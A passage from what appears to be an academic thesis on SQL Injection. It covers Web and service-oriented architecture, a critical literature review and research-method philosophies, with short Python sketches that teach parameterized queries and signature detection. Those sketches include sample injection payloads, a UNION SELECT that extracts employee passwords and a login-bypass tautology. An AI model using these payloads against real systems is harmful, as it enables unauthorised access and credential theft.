thorough understanding of the applications that depend on the RDBMS is crucial, hence it
is necessary to bridge the gap between developers and DBAs (Kunene 2003).

World Wide Web
The purpose of this section is not to characterize the World Wide Web or what it is
about, but to portray the part the Web plays in the grand scene of SQL Injection and
what new dimensions it adds to the problem.
Whereas in the early days of computing computer systems were usually isolated islands
of functionality with little or no interconnectivity, nowadays few are those that sit alone
and do not take part in a broader network of collaborating entities.
Figure 17 - No Application Is An Island
In the old days, security was not really an issue and the worst thing that could happen
would be suffering an attack from yourself. This mindset can be found across several
legacy applications and code (Howard & LeBlanc 2003). Yet, from the findings yielded by
the background review laid out in the introductory chapter, it has been established that
Web applications often interact with corporate core business systems in order to achieve
their goals. All too often these applications are legacy, as organizations cannot get rid of
core business systems at the same rate they become legacy. On top of that, Web
applications are known to undergo rapid development cycles (Huang et al. 2003) and
although security is paramount for Web applications (Spett 2002) only a few can afford a
detailed security review (Nguyen-Tuong et al. 2004). The same background review has
determined that Web architectures are divided into tiers, or layers, each of which acts
as an abstraction layer. The data layer, named that way because of its functional role, is
where the relational database management systems reside and to many it constitutes the
foundation stone for e-Business. As Web attacks are rapidly becoming one of the
fundamental threats for information systems connected to the Internet (Álvarez &
Petrovic 2003), the role of the data layer and its location within the corporate protected
network environment make it a tempting target.
Systems Architectures
«Aligning IT to business» is one of those buzz-statements shouted and repeated in
meeting rooms across all sectors of industry whenever a new restructuring or technical
refresh project is to be implemented or pushed to the stakeholders. But what is
architecture anyway? In engineering terms, one could point out that it has to do with the
aspects of the structure of a system. But there is more to it according to the different
definitions proposed by several respectable organizations:
• «The fundamental organization of a system, embodied in its components, their
relationships to each other and the environment, and the principles governing
its design and evolution» (ANSI/IEEE 1471 2000).
• «The composite of the design architectures for products and their life cycle
processes» (IEEE 1220 1998).
• «A representation of a system in which there is a mapping of functionality onto
hardware and software components, a mapping of the software architecture
onto the hardware architecture, and human interaction with these
components» (Carnegie Mellon University Software Engineering Institute
2006).
• «An allocated arrangement of physical elements which provides the design
solution for a consumer product or life-cycle process intended to satisfy the
requirements of the functional architecture and the requirements baseline»
(Human Engineering 1998).
• «An architecture description is a formal description of a system, organized in a
way that supports reasoning about the structural properties of the system. It
defines the [system] components or building blocks...and provides a plan from
which products can be procured, and systems developed, that will work
together to implement the overall system. It thus enables you to
manage...investment in a way that meets [business] needs...» (Open Group
Architecture Framework 2005).
• «A description of the design and contents of a computer system. If
documented, it may include information such as a detailed inventory of current
hardware, software and networking capabilities; a description of long-range
plans and priorities for future purchases, and a plan for upgrading and/or
replacing dated equipment and software» (The National Center for Education
Statistics 2002).
• «A description of the design and contents of a computer system. If
documented, it may include information such as a detailed inventory of current
hardware, software and networking capabilities; a description of long-range
plans and priorities for future purchases, and a plan for upgrading and/or
replacing dated equipment and software» (Institute of Education Sciences (IES)
2006).

Judging from the number of definitions, to mention just a few, an architecture is
something very complex to define since it relates to a context, aims to achieve a set of
goals, and for that matter, involves means. An article at Wikipedia (2006a) on this subject
neatly summarizes what a robust architecture ought to be, by stating that «a robust
architecture is said to be one that exhibits an optimal degree of fault-tolerance, backward
compatibility, forward compatibility, extensibility, reliability, maintainability, availability,
serviceability, usability, and such other “ilities” as necessary and/or desirable». But systems
architectures should be pictured within a broader reality, as part of what is known as
solution architecture (M.T.Gamble & R.Gamble 2005).
Figure 18 - Bridging the Gap Between Business and IT
[Figure 18 labels: Business, IT Strategy, Architecture, Business/IT “Synchronization”]
Systems architecture could be compared to the supporting arch of a bridge, on which the
solution is based. Delivering it poses a whole new set of challenges which project
management tries to address. Regardless of whether the context is systems or solutions,
architecture is all about bridging IT and business together. Designing it requires an
understanding of the needs and requirements of a wide range of stakeholders covering
the complete scope of the solution (Jari A.Lehto & Pentti Marttiin 2005). Lehto and
Marttiin also state that «system architecture is a powerful means to combine the
diversified needs of several stakeholders». The IEEE standard (ANSI/IEEE 1471 2000) also
opts for a business-centric view of an architecture by placing it at the stakeholders’
service. That standard states that each system must have an architecture and should have
an architectural description consisting of one or more views represented in models which
must conform to a viewpoint assigned to one or more stakeholders. This view that
the business is the ultimate reason for and beneficiary of Information Technology forced
systems architectures to evolve and move up the value chain, culminating in what is
nowadays known as Service-Oriented Architectures (confer with Figure 2 - The Evolution
of Information Technology Architectures on page 27).
Figure 19 - The Evolution to Services
Most literature sources simply cannot resist mentioning Web Services technology
whenever SOA is described (Barry 2003;Calladine 2004;Endrei et al. 2004;Erl 2004), to
the point that many portray SOA as being possible only through the use of Web Services.
[Figure 19 labels: Pre-1990s: custom, static B2B integration; Early 1990s: application
integration technologies appear; Late 1990s: Web technologies appear, e.g., HTTP, HTML, XML;
2000+: Web Services, Service-Oriented Solutions; axis: Business Benefit]
The World Wide Web Consortium (W3C) defines SOA as «a set of components which can
be invoked, and whose interface descriptions can be published and discovered» (W3C
2004). IBM’s view is a bit more technology-centric as they state that «a service-oriented
architecture (SOA) is an application framework that takes everyday business applications
and breaks them down into individual business functions and processes, called services.
An SOA lets you build, deploy and integrate these services independent of applications
and the computing platforms on which they run» (IBM 2005).
Figure 20 - Gartner Web Services Magic Quadrant
Microsoft, the foremost leader in the field of Web Services, expresses a concern for data
exchange in a distributed environment and pictures it as something SOA tries to
address. They state that «Service-Oriented Architecture is an approach to organizing
information technology in which data, logic, and infrastructure resources are accessed by
routing messages between network interfaces» (Microsoft 2005). “Interoperability”
across heterogeneous systems therefore heads the list of SOA’s implications. Others are
message reliability, service reliability, availability, data granularity, normal usability
operations, security, performance, scalability, extensibility, adaptability, testability,
auditability, operability and deployability, and modifiability (O'Brien, Bass, & Merson
2005). As determined previously, the spectrum of “ilities” that fall under an architecture’s
definition really depends on the underlying business goals it tries to accomplish.
Increased interoperability is the most prominent benefit of SOA, especially when Web
Services technology is considered (McGovern et al. 2003). This is therefore likely to be the
leading factor behind the strong bond between SOA and Web Services.
Figure 21 - Web Services Enabled Service-Oriented Architecture
With the SOA approach and Web Services, Web applications are no different from any
other business application. They consume and provide “services” through the use of
“connections”. Web Services provide the means for an abstraction layer, a
refitted version of the business layer of the classic three-tier Web architecture model (see
Figure 8 - Classic Three-Tier Web Architecture Model on page 40). Yet at the very core of the
architecture, line-of-business applications and relational databases remain, and they are
now exposed to an outside environment through the use of Web-enabled technologies.
Security in Applications on the Wild Wild Web
A standard Web security model encompasses four points of authentication before a
query triggered by a remote Web user gets processed on the RDBMS.
Figure 22 - The Four Points of Authentication of a Database-Enabled Remote Web Request
Although many more security barriers can be introduced at the networking level, e.g.
HTTPS, IPSec, etc., SQL Injection attacks rely on the existence of legitimate channels,
hence security barriers at the networking level will mainly serve to prevent unwanted
access, but not necessarily the exploitation of a legitimate connection. Because of this, the
model presented opts for a simplified view which focuses on three entities and the
underlying service providers, also known as daemons. A request emanating from a remote
user via a Web-enabled frontend, such as a browser or a Web service as in the SOA
paradigm, must first of all be accepted by the Web server service, provided that all
networking requirements are already met, as for example, when an HTTPS session is
established. Different Web servers accept different authentication methods, but they all
support anonymous access, the most commonly used option on the Web as users are by
definition external to the organization. One particular case is Microsoft Internet
Information Services (IIS). It implements an option only it can offer: if the remote user is a
member of a trusted Windows domain, IIS allows the user’s credentials to be propagated
down to the Web application level.
Figure 23 - Authentication Methods in IIS 6.0
> adapted from “IIS Management Console” <
Once the user has been granted the right to invoke a resource at the Web server, it is up
to the underlying Web application to carry on. At this point, the security road divides
into two distinct paths: either the Web application impersonates the requesting user’s
security context to carry on its tasks, which only really applies if anonymous access has
not been used, or it uses its own embedded account to authenticate itself against the
operating system and perform the necessary operations on the user’s behalf.
Figure 24 - User vs. Account Impersonation on a Web Application

Regardless of the security model used or the vendor of the Web server, the security
context in which the Web application is executed will be used to authenticate the Web
application against the database system (see Figure 6 - Typical Web Infrastructure Layout
on page 34). Depending on the RDBMS sitting on the DMZ and on the impersonation
model used by the Web application, the credentials used for accessing database objects
within the RDBMS can be one of two: either the security model and information
systems allow user integrated authentication, meaning the requesting user’s credentials
are forwarded all the way down to the database and the user itself exists on the RDBMS,
or the Web application must impersonate a database-specific user to carry on with its
tasks (refer to topic «Security in Databases» within this chapter).
As established before, SQL Injection takes advantage of legitimate channels, which in turn
implies that legitimate security contexts are used as well. If this is so, at first sight it seems
a bit irrelevant to spend time learning about systems architectures, application
topologies and security models. And that is true if, and only if, the attack scope is
limited to the data stored on the database serving the Web application. However,
the scope of SQL Injection can extend far beyond data manipulation and expand to the
RDBMS itself, from there to the operating system of the database server, and from there
to the entire corporate network system. This will be demonstrated in the
Experimenting chapter. However, this will only be effective if the attacker understands all
of the different subjects mentioned above and knows his way around those topics. As
Heterogeneity and Change demand Interoperability and are in great measure
responsible for the SOA paradigm shift, the pressure cascades down to the security
models. Nowadays it is unthinkable not to have an integrated authentication mechanism
which is transversal to the whole corporate IT environment, simply because it would be
impossible to manage such an environment. One product of this pressure is the
Lightweight Directory Access Protocol (LDAP), which defines a standard for organizing
directory hierarchies and interfacing to directory servers. If, on the one hand, Integration
and Interoperability represent the answer to Heterogeneity and Change, on the other hand
they could also mean that once a weakness is exploited its consequences could potentially
propagate to the entire corporate IT environment, including core legacy systems as
established earlier.
Furthermore, logical attacks are in general harder to detect and protect against
(Landsmann & Strömberg 2003;OWASP 2006;Spett 2002) than networking attacks. This
is a classical case where technology cannot solve business problems. So the answer must
lie elsewhere, away from a technology-centric view of the problem. This is usually the
time when principles, frameworks and guidelines tend to provide a good insight into
what the solution might be, as for example the least-privilege principle. Howard and
LeBlanc (2003) propose a set of four principles that explain why the advantage is always
on the hacker’s side, and which may therefore provide a good insight on how to look into
security on the Wild Wild Web:
>
THE DEFENDER MUST DEFEND ALL POINTS; THE ATTACKER CAN CHOOSE THE WEAKEST POINT
Pretty much like on a castle assault, the defender has many defences at his
disposal and many places where he can suffer an attack. On the other hand, the
attacker only needs to focus on a single vulnerability and exploit it. This is why
hardening systems is so important.
>
THE DEFENDER CAN ONLY DEFEND AGAINST KNOWN ATTACKS; THE ATTACKER CAN PROBE FOR
UNKNOWN VULNERABILITIES
Software can only be shipped with defences from pretheorized or preunderstood
points of attack. The added value of this work is to address this issue.
>
THE DEFENDER MUST BE CONSTANTLY VIGILANT; THE ATTACKER CAN STRIKE AT WILL
Monitoring systems is a tedious time-consuming task, whereas the attacker can
remain unnoticed, waiting for the right moment.
>
THE DEFENDER MUST PLAY BY THE RULES; THE ATTACKER CAN PLAY DIRTY
Although in software development this is not always true, while the defender has
access to some white-hat tools, the attacker can use any intrusion detection tool.

CRITICAL ANALYSIS
The literature review procedure herein carried out is of a critical nature, as opposed to
self-study, historical, theoretical, methodological and integrative types of review. The
purpose of this section is to argue critically on the findings yielded by the review spiralling
process in order to try to address questions such as “what lessons can immediately be
taken?”, “which approaches can immediately be discarded due to low expectations?”,
“which are the major areas surrounding the topic?”, “what additional research is there to
be carried out in this field?”, and “how does this work relate to others in this field?”.
Lessons Learned
It has been clearly established that there are no dissonant voices when it comes to
characterizing SQL Injection and the underlying factors responsible for its existence. This
consensus extends to the devastating impact it may cause on organizations, although
literature sources vary quite a bit in terms of in-depth knowledge and internal evidence.
Regardless of how long SQL Injection has been around, and no one can clearly state
an exact time span for its appearance, the harmony across literature sources makes it
safe to state that the Web-shift associated with the e-Business paradigm
added a whole new dimension to the problem. Many business processes were migrated
to a webbed context and new Web-based services were offered, but core legacy business
systems and line-of-business applications otherwise very well guarded within the heart of
the corporate IT infrastructure were now, even if indirectly, exposed to an external and
quite often public environment, although they were never initially designed to withstand
such demand. Furthermore, the Web context is known to be a rapidly changing
environment where time-to-market plays a very important role. For this reason, Web
applications tend to undergo rapid development cycles, hence augmenting the risk of
cascading errors that can span all the way down to the core business systems. Relational
database management systems (RDBMS) constitute the foundation stone on which
e-Business is founded, as it would be impossible to implement the inherent
dynamics of e-Business without data and data management. Whenever there is a
dynamic Web application, there is surely at least one RDBMS standing behind it; yet, in
the vast majority of cases, the Web application and the RDBMS are part of a broader
reality which is the corporate IT network. Undermining one system could potentially
jeopardize the whole corporate IT fabric. Because RDBMSs are all over the place and also
because data is the fuel of e-Business, these systems are a tempting target for anyone
wanting to take advantage of any vulnerability.
Literature also establishes that the existing security mechanisms concentrate on the
networking level. Logical attacks, the class of attacks SQL Injection belongs to, can
literally shatter corporate investments in IT security, as these mechanisms are still in the
early stages of addressing these classes of attacks.
In light of the findings it is also possible to conclude that the topic is still poorly studied,
obscure, hard to detect and even harder to prevent. Pre-emptive countermeasures in this
field have been neglected and there is a research void surrounding the topic.
Though there are some pioneer projects, guidelines and principles that help to minimize
the threat, there is no consistent set of systematized procedures available.
SQL Injection is not tied to any particular RDBMS product or vendor; instead, it is a
side effect of the tight coupling between e-Business architectures and RDBMS which
implement SQL as their fourth generation programming language. The scope of the
problem is broadened by the fact that RDBMS and data-driven applications, such as Web
applications, are part of the corporate IT network environment.

Direct Implications
A survey of the existing definitions for the research topic has revealed that no formal
unifying definition has been proposed. All the sources try to formulate a definition in
terms of the effects, causes and inner workings of this technique. Furthermore, the
danger of this strategy for defining it resides in the fact that there are unlimited variations of
SQL Injection attacks (Álvarez & Petrovic 2003). The reason why no formal
definition could be found in literature could be attributed to the fact that the topic is still
poorly studied (Landsmann & Strömberg 2003). Based on the findings yielded by this
literature review and produced during the course of this research, a formal definition
must be attempted as part of the proposed taxonomy.
This absence of a unifying definition denotes a broader sad reality. The obscurity that
has been surrounding the research topic contributes a lot to the lead of the hacking
community. If there is a direct implication that comes out of the literature review process,
it is that in order to proceed with effective countermeasures it is absolutely necessary to
systematize the threat, thus empowering others to build on top of this knowledge.
Refutation of Arguments
Although Wikipedia (2006f) provides a good entry-level definition of what SQL Injection
is about, the statement that «SQL Injection (…) occurs in the database layer of an
application» is not accurate. Literature indicates that even though the database layer is
the end target, SQL Injection is only possible due to flaws in the input validation logic of
an application, hence, the business layer is the one that is in fact faulty (consult Figure 8 -
Classic Three-Tier Web Architecture Model on page 40). Once the foothold is established
on the database layer, the attack can then expand to other areas of the IT fabric.
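To make the point about the business layer concrete, here is a minimal sketch in Python's sqlite3 of a business-layer function that validates its input and hands it to the database as a bound parameter rather than as SQL text. The schema, the find_product function and the MAX_NAME_LENGTH rule are hypothetical and stand in for whatever validation logic a real application would apply; this is an illustration, not a complete defence.

```python
import sqlite3

# Hypothetical schema used only for this illustration.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE Product (Name TEXT, ListPrice REAL);
    CREATE TABLE Employees (Login TEXT, Password TEXT);
    INSERT INTO Product VALUES ('Paper Clips', 1.5);
    INSERT INTO Employees VALUES ('admin', 's3cret');
""")

MAX_NAME_LENGTH = 100  # hypothetical business rule


def find_product(name_filter):
    # Business-layer validation: reject input outside the expected shape.
    if not isinstance(name_filter, str) or len(name_filter) > MAX_NAME_LENGTH:
        raise ValueError("invalid product name")
    # Parameter binding: the value travels separately from the SQL text,
    # so it is compared as data and never parsed as SQL.
    rows = conn.execute(
        "SELECT Name FROM Product WHERE Name = ?", (name_filter,)
    )
    return [row[0] for row in rows]


payload = "x' UNION ALL SELECT Login || '/' || Password FROM Employees --"
print(find_product("Paper Clips"))
print(find_product(payload))
```

With binding in place the crafted string is simply a product name that does not exist, so the query returns no rows. The database layer is unchanged between the vulnerable and the corrected variants; only the application code differs.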

Another common mistake committed by several literature sources is to depict SQL
Injection as a Web-only problem. Enough internal evidence has been presented to point
out that SQL Injection is a product of the most commonly used set of technologies and
architectures. Of course the webbed context adds a whole new dimension to
the problem, making it impossible to mention SQL Injection without referring to its
role in the e-Business paradigm. Still, every Web Application using a relational database
can theoretically be subject to SQL Injection attacks (Landsmann & Strömberg 2003).
With regard to the underlying causes of SQL Injection, some sources state that SQL
Injection is the sole result of faulty programming techniques, and ultimately the
developer’s fault (Waymire 2004), and that solving this threat is therefore a rather
simple task (SPI Labs 2003). Literature as a whole strongly disagrees with this viewpoint,
although it acknowledges the paramount role policies and principles play in the scene.
The SQL Injection problem is far more complex and considerably less
easy to fix, as organizational, technological and methodological factors also have to be
taken into account (see Figure 10 - Summary of the Causing Factors of SQL Injection on
page 43).
Paramount Topics Surrounding SQL Injection
• Information Security;
• Security in e-Business;
• Coding Practices;
• Logical Attacks;
• Code Injection.

Additional Research
The literature sources yielded by the literature spiralling process were of a technical nature,
which is in line with this work’s goals. Yet a tremendous lack of materials that approach
the SQL Injection threat from a management-centric perspective has been observed.
For those who believe, this researcher included, that the sole purpose of IT is to address a
specific business need, any analysis around SQL Injection will only be complete if both
technical and business factors are included. This researcher firmly believes that additional
research on the impact of SQL Injection on organizations will be a valuable asset in
understanding the full extent of the SQL Injection threat.
But there is still much to be done in the technical field. It seems that only minimal
resources are invested in developing security standards and in-built security measures in
Web applications (Landsmann & Strömberg 2003;Viega & Messi 2004). This work’s main
goal is to expose the threat so that additional Knowledge can be built on top of it. This
Knowledge should encompass standards, policies and procedures that can build on
existing countermeasures and methodologies in order to ensure a complete and unifying
remedy to SQL Injection.
It would certainly be worthwhile to investigate how new methods of pattern analysis
could be incorporated into existing Intrusion Detection Systems (IDS) in order to better
assess whether an SQL Injection attack is under way and stop it.
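As a naive starting point for the kind of pattern analysis suggested here, the sketch below checks an input string against a handful of regular-expression signatures. The signature set and the looks_like_injection function are hypothetical and deliberately small; they are not drawn from any existing IDS product and are meant only to show why static signatures alone are a weak basis for detection.

```python
import re

# Hypothetical, deliberately small signature set.
SIGNATURES = [
    # Tautologies introduced after a closing quote, e.g. ' OR 1=1
    re.compile(r"'\s*(or|and)\s+.+=", re.IGNORECASE),
    # A second result set appended through UNION ... SELECT
    re.compile(r"\bunion\b.+\bselect\b", re.IGNORECASE),
    # Comment markers and statement separators
    re.compile(r"(--|/\*|;)"),
]


def looks_like_injection(value):
    # Flag the input if any signature matches anywhere in it.
    return any(sig.search(value) for sig in SIGNATURES)


samples = [
    "Paper Clips",
    "x' UNION ALL SELECT Login FROM Employees --",
    "' OR 1=1",
    "1 OR 1=1",       # numeric-context attack with no quote: missed
    "O'Brien; Bass",  # harmless text containing a semicolon: flagged
]
for sample in samples:
    print(sample, looks_like_injection(sample))
```

The last two samples show both failure modes at once, a missed attack and a false alarm, which is consistent with the observation that these attacks are hard to detect.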
Finally, SQL Injection has a lot to do with runtime interactions and behaviours which are
by definition difficult, if not impossible, to predict. This seems to be a good research field
for applied heuristics.

Projects In This Area
At present the topic is still rather obscure, and one cannot say there is a
consolidated front for addressing or characterizing the problem. However it is clear
the industry has awakened to the problem and that some built-in countermeasures are
being included. Apart from what the industry is currently pursuing, two independent
projects surface as a real effort for addressing the SQL Injection threat:
• The Open Web Application Security Project;
http://qb0x.net/papers/MalformedSQL/sqlinjection.html;
• The Open Web Application Security Project; http://www.owasp.org/.

CONCLUSIONS
Since the literature review process herein carried-out is of critical nature, it is already
possible to draw some conclusions that can be formulated from the internal evidence
presented in this review. This first wave of conclusions is of high importance as it may
influence the formulation of this research’s methods and therefore devising conclusions
at this stage is highly desirable.
The literature suggests that the hacker community is one step ahead of IT security, at least
when it comes to logical attacks such as SQL Injection. Signs of that gap narrowing are
scarce, as it seems that only minimal resources are being invested. Contributing to this
gap, the lack of academic literature on the subject contrasts with the number of rich and
ingenious resources scattered across hacking sites and underground
communities. This has made the topic rather obscure, yet it constitutes a serious
threat to any organization that relies heavily on information systems to conduct its trade.
Internal evidence also makes it possible to conclude that SQL Injection attacks are not
made possible by any inherent flaw in any vendor-specific relational database
management system; they are rather the result of the practices and
systems architectures commonly used over the past few years.
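The point that the weakness lies in coding practice rather than in the database product can be illustrated with a minimal sketch. It assumes a hypothetical `users` table and uses Python's built-in `sqlite3` module purely as a convenient stand-in for any RDBMS; the function names are invented for this example.

```python
import sqlite3


def make_db():
    """Create an in-memory database with one hypothetical user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return conn


def login_concatenated(conn, name, password):
    # Vulnerable practice: user input is pasted directly into the SQL text,
    # so the input can change the structure of the statement.
    sql = ("SELECT COUNT(*) FROM users WHERE name = '" + name +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()[0] > 0


def login_parameterized(conn, name, password):
    # Safer practice: input is bound as data and never parsed as SQL.
    sql = "SELECT COUNT(*) FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone()[0] > 0


conn = make_db()
attack = "' OR '1'='1"
bypassed = login_concatenated(conn, "alice", attack)   # login succeeds without the password
blocked = login_parameterized(conn, "alice", attack)   # login is rejected
```

The same database engine serves both functions; only the way the query is assembled differs, which is consistent with the conclusion that the threat is vendor-agnostic.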
Decoupling the threat from any specific vendor or RDBMS product broadens the scope of SQL
Injection to virtually any e-Business system in the world. In fact, the growth of
database-enabled Web applications, the backbone of e-Business, is largely responsible
for the proliferation and success of this threat.
In summary, at present virtually any database-dependent information system can be
a target for SQL Injection, consequently compromising all systems and information assets
within the same security boundary, yet safeguarding against these attacks is still cumbersome.

Chapter 3
METHODOLOGY
Each method, tool or technique has its unique
strengths and weaknesses. There is an inevitable
relationship between the collection of methods employed
and the results obtained. Research should then be looked
upon as a highly creative process, where it is necessary to
comprehend and reflect, before taking action.
This chapter begins by providing an overview of the existing set of research
philosophies, research approaches, research strategies, time horizons, and data
collection methods. These will then form the basis of the research methods to be
applied in this work, culminating in a research methodology that addresses
the objectives previously set out and ultimately provides the means to answer
the research question.

methodology •
RESEARCH STRATEGY
The research strategy used for reviewing literature on research methods, which forms the basis
for establishing this work’s research methodology, was no different from that used
for reviewing literature on the research topic.
This strategy is described in great detail at the very beginning of the Literature Review
chapter on page 23. Taking into account the difference in context between the two
research subjects, the only difference to be noted is the set of search terms used.
For this particular research, the following search terms were used:
• Research methods;
• Research methodology;
• Qualitative;
• Quantitative;
• Positivism;
• Interpretivism;
• Experimentation;
• Induction;
• Deduction;
• Action Research.

FINDINGS
The following diagram is a consolidated overview of the dominant research philosophies,
techniques and approaches found in the literature; equally important, it also depicts
their relative ontological positioning:
[Figure: layered diagram. Research Philosophy: Positivism, Realism, Interpretivism. Research Approaches: Deductive, Inductive. Research Strategies: Experiment, Survey, Case Study, Grounded Theory, Ethnography, Action Research. Time Horizons: Cross Sectional, Longitudinal. Data Collection Methods: Sampling, Secondary Data, Observation, Interviews, Questionnaires.]
Figure 25 - The Research Process “Onion”
Though this diagram would neatly serve as a wrap-up summary of this section, it also serves as a
good starting point, as it can be used as a navigation chart whenever the inner subjects
are referenced. Hence, the research methods yielded by the literature research process
will be described from the outside in, and from top to bottom.

4 Research Philosophies
Research philosophies constitute the foundation stone on which the researcher will build
his quest for Knowledge. Research philosophies are ultimately tightly coupled to the
researcher’s way of thinking as to what is the best philosophy to address the research
question (Saunders, Lewis, & Thornhill 2003). Though at first glance this statement seems
rather innocuous, the way one thinks about the process of doing research will, even if
unwittingly, affect the way research is conducted.
On opposing sides, positivism and interpretivism, also known respectively as quantitative
research (Baskerville 1999) and qualitative research (Wixon 1995), are nowadays
accepted as equally worthy philosophies in the quest for Knowledge (Avison et al.
1999; Dawson 1999; Saunders, Lewis, & Thornhill 2003). However, there are dissenting
voices. Many young researchers (and some experienced ones as well) have erroneously
deemed qualitative research less valuable than quantitative research (Dawson 1999).
This can be partially explained by the long tradition quantitative research has in the
Natural Sciences. Conversely, when the human factor is introduced, e.g. in the Social
Sciences, quantitative research fails to adequately address all aspects of the research
scope and qualitative research is increasingly used (Hancock 1998). Between these
two philosophies stands critical realism, attempting to combine the best of both worlds.
4Positivism
Alavin & Carlson (1992), cited by Baskerville (1999), indicate that a considerable
percentage of all research conducted in the field of Information Technology is positivistic
in nature. They based their claim on the observation of several US scientific journals and the
research methods employed in the published papers. Positivistic research, also known as
the Scientific Method, is based on the notion that the researcher is objective,
independent and completely detached from the research subject. Results will therefore
be valid, credible and replicable by anyone else who undertakes the same steps
(Baskerville 1999; Gephart 1999a; Saunders, Lewis, & Thornhill 2003).
According to Kenneth (2001), this research philosophy deals with three vectors:
Description, Prediction and Control. For a positivistic approach to take place it is necessary
to formulate a model for describing the problem, which in turn implies the existence of
variables. These are isolated through environment control, e.g. samples, in order to
break down the problem and attempt to formulate new models based on new
interactions of the same variables within various environments. The resulting Knowledge
will depict reality as per the formulated model and consequently be able to predict future
behaviours within a well-defined context.
Sarker & Lee (1998) cite Lee (1989), Yin (1989) and Miles & Huberman (1994) on
the guidelines that should be followed to ensure the rigor of the research process:
• Construct validity:
  ◦ Using multiple sources of evidence;
  ◦ Having key informants review the case study report;
  ◦ Maintaining a Chain-of-Evidence;
• Internal validity;
• External validity;
• Reliability.
So positivism is all about finding the right model to describe a well-defined reality,
typically the scenario posed to a Natural Sciences researcher. Baskerville (1999) states
that, for this reason, positivism fails to properly address realities that cannot be
well-defined, for example when the randomness of human behaviour is part of the
system under study, thus frustrating any chance of Prediction, not to mention Control.

4Critical Realism
Realism is based on the premise that reality exists regardless of any human thoughts or
beliefs. In the field of Social Sciences and management, according to Saunders, Lewis, &
Thornhill (2003), critical realism can indicate «that there are large-scale social forces and
processes that affect people without their necessarily being aware of the existence of
such influences on their interpretations and behaviours». The same source suggests that
business and management research is often a mixture of positivism and interpretivism
and that critical realism can provide a new insight into studying these fields.
4Interpretivism
Whitman & Woszczynski (2004) argue that qualitative research is research in which
interpretive analysis is used to study research subjects in their natural environment, thus
placing the researcher “in the field”. Qualitative research explores attitudes, behaviours
and experiences through the use of several data collection methods, such as interviews
and case-studies, and tries to capture the participants’ viewpoints (Dawson 1999).
Kenneth (2001) refers to four key points that must be taken into account whenever
qualitative research is used: a) definition of truth; b) determining the human-related
scope; c) definition of the researcher’s role; and d) the perception of the different
contributions. Defining the reliance interval for which the findings can be deemed
applicable seems similar to the definition of a model used in positivistic research.
However, the challenges are completely different. Factors such as time period, place
and persons involved, amongst others, may never be replicated. If broader factors are
taken into account, for instance the environment of a particular business situation,
replication is simply impossible; hence, findings will only be true in a well-defined,
time-localized context. With regard to the second key point, scoping the human-related
factors will provide input for the definition of what the study environment is. The
definition of the environment will in turn determine the truth interval of the findings. As for
the researcher’s role, unlike in positivism, the researcher is not detached from the reality
under study. In qualitative research, the researcher is not comfortably sitting on a chair
analysing test subjects through a microscope; instead, he is in the Petri dish poking,
questioning, and interacting with them. Defining the researcher’s role will relate back to
the reliance interval of the findings. Finally, having a clear perception of each individual’s
contribution to the grand picture will make it possible to extrapolate a broader reality from a
subset of research subjects. With rare exceptions, access to the complete
universe under study is unfeasible, if not totally impossible.
Unlike in positivism, the Knowledge gained during research cannot predict future events, as
the “variables” cannot all be replicated. Though this may seem to be a handicap,
interpretivists argue that generalisability is not of crucial importance (Saunders, Lewis, &
Thornhill 2003). Furthermore, the sum of the Knowledge gathered by various researchers,
each with a unique insight into a little piece of reality, will add bits and pieces to the
broader ecosystem in what is known as Social Constructionism. This proximity between
the researcher and research subjects, and the fact that the resulting Knowledge cannot be
widely applied in predicting future events, raise a legitimate concern about the credibility
of the results obtained. A response could be the wide acceptance by the interpretivistic
community of replication as a credible means of confirming the results of any given
qualitative research (Whitman & Woszczynski 2004). The lack of a well-defined model of
“laws” which social interactions ought to obey, as opposed to the Natural Sciences
(Saunders, Lewis, & Thornhill 2003), is what stands behind interpretivism. As with neural
networks, where a model describing the interactions, inputs, and outputs is unavailable,
only replication can provide the means for obtaining and consolidating Knowledge.
Whitman & Woszczynski (2004) argue that, for this very reason, interpretivism should also
be applied to Information Systems research. They back this statement up with a citation
from Hirschheim (1992), who states that the epistemology of Information Systems is
to a great extent based on the Social Sciences, since Information Systems are to a great
extent social systems rather than technical ones. This position is also reinforced by a citation
of Lee (2001), who claims that the real challenge lies in capturing the interactions
between technology and human behaviours, much like what happens during a
chemical reaction.
4 Research Approaches
Research approaches divide into two distinct groups: Deduction and Induction.
Deduction is of positivistic nature, whereas induction is of interpretivistic inspiration.
4Deduction
Since deduction relates back to the second layer of the onion that is being peeled, it
implies that a decision in terms of research philosophy must have been made
prior to reaching this level. Deduction requires the definition of a theory and the formulation
of a hypothesis that will be tested. Robson (1993), cited by Saunders, Lewis, & Thornhill
(2003), enumerates five consecutive steps to which deductive processes should adhere, and
which can be repeated if necessary:
• Formulating a hypothesis based on a theoretical model;
• Expressing the hypothesis in operational terms;
• Testing the hypothesis as per the operationalization model;
• Analysing the results;
• If necessary, revising the theory in light of the results obtained.

4Induction
In contrast to deduction, where the pre-existence of a theory is required, induction seeks
to build one (Saunders, Lewis, & Thornhill 2003). This way of approaching the quest for
Knowledge places induction perfectly in line with qualitative research (refer to Figure 25 -
The Research Process “Onion” on page 105). In induction, theory follows data and
not the other way around. Instead of creating a rigid “law”, a new space of alternative
possibilities is created (Saunders, Lewis, & Thornhill 2003). As the role of theory
diminishes, test subjects claim that space by gaining more prominence. Their high
relevance means that only a few test subjects are included in the study. This paradigm
opposes Yin’s (1989) and Lee’s (1989) guidelines for positivistic research, which
include several test subjects as a means of producing internal validation.
4 Research Strategies
As the research process onion is peeled, the scope of research methods begins to
narrow down toward the definition of a research methodology that fits the research
objectives previously set out. For this reason, those research strategies and
related methods yielded by this literature review that do not relate to the goals of this
research will not be described in great detail.
4Experimentation
Experimentation is all about cause and effect and is the pinnacle of positivistic research. All
the concerns of positivism, e.g. theory and hypothesis, validity, reliability, etc., apply
directly to experimentation. According to Saunders, Lewis, & Thornhill (2003),
positivistic research that uses experimentation as its research strategy is composed of six
sequential steps:
• Formulating a hypothesis based on a theoretical model;
• Selecting test subjects from known populations;
• Allocating test subjects to different test scenarios;
• Introducing planned changes into a limited, well-defined set of variables;
• Measuring a limited number of variables;
• Controlling the variables.
In many respects these bullets are similar to the ones proposed by Robson (1993) in
regard to deduction, which reinforces the strong bond uniting positivism, deduction
and experimentation as depicted in Figure 25 - The Research Process “Onion”. In terms
